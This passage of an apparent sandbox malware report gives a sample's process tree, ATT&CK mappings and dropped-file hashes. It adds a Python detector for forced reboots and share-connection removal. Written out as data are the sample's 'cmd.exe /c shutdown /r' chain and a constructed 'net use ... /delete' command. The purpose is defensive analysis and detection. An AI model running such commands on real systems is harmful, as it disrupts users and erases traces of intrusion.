        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3336)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5204)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5288)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5764)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4304 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5772)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5560 /prefetch:8
        Signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4660)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4008 /prefetch:8
        Signatures: Suspicious behavior: EnumeratesProcesses
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5444)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5988)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5996)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe (PID 1088)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:8
        Signatures: Suspicious behavior: EnumeratesProcesses
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4288)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2204)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
  - C:\Windows\SysWOW64\cmd.exe (PID 5536)
    Command line: "C:\Windows\System32\cmd.exe" /c shutdown /r
    Signatures: System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\shutdown.exe (PID 5344)
      Command line: shutdown /r
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken

- C:\Windows\System32\rundll32.exe (PID 4840)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

- C:\Windows\System32\CompPkgSrv.exe (PID 3028)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

- C:\Windows\System32\CompPkgSrv.exe (PID 3384)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

- C:\Windows\System32\CompPkgSrv.exe (PID 2012)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

- C:\Windows\System32\PickerHost.exe (PID 6136)
  Command line: C:\Windows\System32\PickerHost.exe -Embedding
  Signatures: Suspicious use of SetWindowsHookEx

- C:\Windows\system32\LogonUI.exe (PID 3464)
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa3963855 /state1:0x41c64e6d
  Signatures: Modifies data under HKEY_USERS; Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- Indicator Removal (1)
  - Network Share Connection Removal (1)
- Modify Registry (1)
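Two behaviours in this report are worth turning into detection logic: the reboot chain in the process tree (the sample spawns cmd.exe /c shutdown /r, which spawns shutdown.exe and adjusts its privilege token to obtain SeShutdownPrivilege), and the Network Share Connection Removal row in the ATT&CK summary. One detail in the tree deserves a caveat: the parent asked for C:\Windows\System32\cmd.exe but C:\Windows\SysWOW64\cmd.exe is what ran. That is WOW64 file-system redirection, which means the parent process is 32-bit, a useful enrichment when hunting. The following Python is an added example written for this page, not code from Triage or from the sample; it runs the two rules over constructed process-creation records modelled on the tree above. The shutdown chain PIDs (5536, 5344) and the cmd.exe PID 1396 come from the report; the sample's own path, its PID 4000, the net use target and the remaining records are assumptions for the example. ATT&CK IDs T1529 (System Shutdown/Reboot) and T1070.005 (Indicator Removal: Network Share Connection Removal) are the standard mappings.

```python
"""Flag forced reboot/shutdown and network-share connection removal in
process-creation records, and note WOW64 path redirection in the chain.
Added example for this report; the records below are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str    # path of the binary that actually ran (Triage's first column)
    cmdline: str  # command line the parent supplied (Triage's second column)


@dataclass(frozen=True)
class Finding:
    pid: int
    technique: str
    name: str
    chain: list          # PIDs from the flagged process up to the tree root
    from_user_path: bool  # an ancestor runs from a user-writable location
    wow64_in_chain: bool  # some process in the chain was WOW64-redirected


# Constructed records modelled on the report's process tree. The shutdown
# chain (5536 -> 5344) and PID 1396 copy the page; the sample's path, PID 4000,
# the net use target and the other records are assumptions, not report data.
SAMPLE = [
    Proc(4000, 1, r"C:\Users\Admin\Downloads\Lose2himatoV2.exe",
         r'"C:\Users\Admin\Downloads\Lose2himatoV2.exe"'),
    Proc(5536, 4000, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c shutdown /r'),
    Proc(5344, 5536, r"C:\Windows\SysWOW64\shutdown.exe", r"shutdown /r"),
    Proc(1396, 4000, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c net use \\fileserver\share /delete /y'),
    Proc(3028, 1, r"C:\Windows\System32\CompPkgSrv.exe",
         r"C:\Windows\System32\CompPkgSrv.exe -Embedding"),
    # shutdown /a aborts a pending shutdown; it must not trip the reboot rule
    Proc(7000, 1, r"C:\Windows\System32\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c shutdown /a'),
]

# shutdown[.exe] followed by a /r (reboot), /s (power off) or /p switch
SHUTDOWN_RE = re.compile(r'shutdown(?:\.exe)?"?\s+(?:\S+\s+)*/[rsp](?:\s|$)', re.I)
# net[1] use <target> /delete  (net accepts the abbreviations /del and /d)
NET_DELETE_RE = re.compile(r'\bnet1?(?:\.exe)?"?\s+use\b.*\s/d(?:el(?:ete)?)?(?:\s|$)', re.I)
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\users\\", re.I)


def wow64_redirected(p: Proc) -> bool:
    """Parent requested System32\\x.exe but SysWOW64\\x.exe ran: WOW64 file-system
    redirection, which tells you the requesting parent is a 32-bit process."""
    return "\\syswow64\\" in p.image.lower() and "\\system32\\" in p.cmdline.lower()


def ancestors(p: Proc, by_pid: dict):
    """Yield parents up to the root; the seen-set guards against PID reuse loops."""
    seen = {p.pid}
    while p.ppid in by_pid and p.ppid not in seen:
        p = by_pid[p.ppid]
        seen.add(p.pid)
        yield p


def detect(procs) -> list:
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        base = p.image.rsplit("\\", 1)[-1].lower()
        chain = [p, *ancestors(p, by_pid)]
        from_user = any(USER_WRITABLE_RE.match(a.image) for a in chain)
        wow64 = any(wow64_redirected(a) for a in chain)
        pids = [a.pid for a in chain]
        if base == "shutdown.exe" and SHUTDOWN_RE.search(p.cmdline):
            findings.append(Finding(p.pid, "T1529", "System Shutdown/Reboot",
                                    pids, from_user, wow64))
        if NET_DELETE_RE.search(p.cmdline):
            findings.append(Finding(p.pid, "T1070.005",
                                    "Indicator Removal: Network Share Connection Removal",
                                    pids, from_user, wow64))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE):
        print(f"{f.technique} {f.name}: pid {f.pid}, chain {f.chain}, "
              f"user-path origin={f.from_user_path}, wow64 redirect={f.wow64_in_chain}")
```

The reboot rule keys on the shutdown.exe image rather than on every command line that mentions shutdown, so the cmd.exe parent is not reported twice; the share-removal rule matches on the command line of whichever process carries it, which is how the report attributes that behaviour to cmd.exe PID 1396 rather than to net.exe.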
Downloads

- Filesize: 152B
  MD5: 1fc959921446fa3ab5813f75ca4d0235
  SHA1: 0aeef3ba7ba2aa1f725fca09432d384b06995e2a
  SHA256: 1b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c
  SHA512: 899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06

- Filesize: 152B
  MD5: e9a2c784e6d797d91d4b8612e14d51bd
  SHA1: 25e2b07c396ee82e4404af09424f747fc05f04c2
  SHA256: 18ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6
  SHA512: fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 4KB
  MD5: 39ae39c20393fe4d4d10660a2a5afbae
  SHA1: 881bea76cd0b3a82d9ccebe0d274ca7fc0e07331
  SHA256: a5244ac453c9cba51453394051e2500662e7781ce6992ca47fa796efaa41bb1f
  SHA512: 605e6bb6e18fec2ef15ca885449bd0590546d5271f0c2060be372910c1b023f42761e093beb09d274c6b1cbe1baf8ed73fbbc2accc084077c3d778da5f5ee655

- Filesize: 1KB
  MD5: 261f4b8973461c839950cd319ce25f9b
  SHA1: 6db12a8fb6d35403accb13aab871357dcb6c2986
  SHA256: a67f04dcc9f0b510dab9f97fa59d2fb9e5dd29f88ab0ff9548c09457b0d7109e
  SHA512: 59b7fbbc5758326f5a37958d213cd3b597ad23645aac5dc3d3c6b45bd3001af2bd2db1fe4e82ec6c9248733a3e960d3c577372d4abf24a9b2b9c9d7adb124ae9

- Filesize: 7KB
  MD5: f787c2ccd3eafb643d8204461a62ebc7
  SHA1: 8d3beef31155fd374ad3176e21dac3f734609346
  SHA256: fc52d47012c87dfdc3bbd51584e1f3806c5dcc57085ea74550c15d4cb44e3f09
  SHA512: f59cef69ef030d2960c5712d3ecea6b1854fb62ac753f6da6a96e1c8e553a27f0205bbfca4a28cf45b810a73c69085f50bfac115420642f4fe7623fd1fdfae69

- Filesize: 8KB
  MD5: 5ec4f296ad33e9264799e23acb0bf836
  SHA1: 65ddab1c83c9ae0a9654c79e338104f7ebe36bf5
  SHA256: 25bf95258463e0d7b6d3c3919ff852436cf6947be8d6bdaa23f0ff3c3565ddcf
  SHA512: 84481f0b18c1506c78d322c6301002fa4aab1d25c5da947611ed1c88e59d7ce00f54d83f236e49b484657d31d24d8c599e3b95da79f0dbc3c1d014cb82a1ecf1

- Filesize: 5KB
  MD5: a91a5fcb996568974e5e95f32da4ef46
  SHA1: 0bad6a870b84ff74d7ddecd8737c3c5c68902be0
  SHA256: 69798782aa12886229631a6296ad1172a566fa028f7b73a5fd63b711b143116b
  SHA512: 4be596ae29640880b8ab0639f8574625cf648d88609b5ebc23c5fe0b27b8bc79d8ea57927cd9211b6228a640455fd3345f50f6e963e3a8d66105348c9825e22b

- Filesize: 2KB
  MD5: 0d6a29583ac035368732781f6052d93d
  SHA1: 23e6580cb4a9f4ccba8a4a215a06a2f16c38e506
  SHA256: 876c5cb2c2374b4fe513af1c81f67839fc4e51c4eb9697695b952cc3c4035cdd
  SHA512: e99ed06d759ba878e8cf7ec4786d7892d6320731d95946fc49cffd73163604d51c7ca435b189df3f74ac991dc57528d928a4f29c660a04bbf5f1c8ca3c937192

- Filesize: 2KB
  MD5: 35afed088810ac6a2676153d761f1c6b
  SHA1: 98dc9dc9cdfe87cde826e5a9c180ba4650559e41
  SHA256: abf6fee354bbd29f4a44f8527645262e68364f955fc4dcc63f4aed638297f78d
  SHA512: de10baba855ed528eeb2a9f36b11630c9021c5a02bca2873069233131fd8ce874fa3c475cd4ef321eab6b2007c844860854b19c1fa044ee5f68ce3b9271cb248

- Filesize: 16B
  MD5: 206702161f94c5cd39fadd03f4014d98
  SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
  SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
  SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

- Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

- Filesize: 8KB
  MD5: c1b8552aa498cfe87871d514578f2151
  SHA1: d095ff3f0e9bc4fde468b027e466a67b29b3fa64
  SHA256: e3ae816bf2fb60d549062493d8590bcf48ec395a6b062c9a50b0356fd320baa8
  SHA512: ef13862086502c6fad1c5656d5c9c9be3757b0a2ba9bde96b13ecfb95a49b235e472068c937189e292f7035636139da0e426e63e7edb5772b3f8fd17fe3773e4

- Filesize: 10KB
  MD5: 38a9138e280d0b143cae98f09fd43a31
  SHA1: 59afd35c057d5e49c5e39a000adfbb8ae6370089
  SHA256: 4b96726b09eb1fae38ba0a4a0f94fb2b66a84b7ae215b30fff4ac99c0ed74f8f
  SHA512: fab8336cbd21d5e2166e30b0b277f1d8bdc4690d19f2212900b5fb7e826a21429d4147329eae795966e35f8be7d113f1cf118c2d10de24aeb05d22ceb4dd83bf

- Filesize: 10KB
  MD5: 495c43e2f78f09eac83f639cef2b8a23
  SHA1: 3b25858c3aabb3bc392bb8000ef8035f22485812
  SHA256: 8126d9cbfef903337124be0217d44ecaeae6465045b08366b9380498fb1a2dda
  SHA512: 086c7308543e5e4802e83f230b1f2ad3496624cdb3e998521e0441b7c8be0c7921a59d2fee4fd969a2a87cd8b7847380e525f50628d357df1cac4edcf66deecb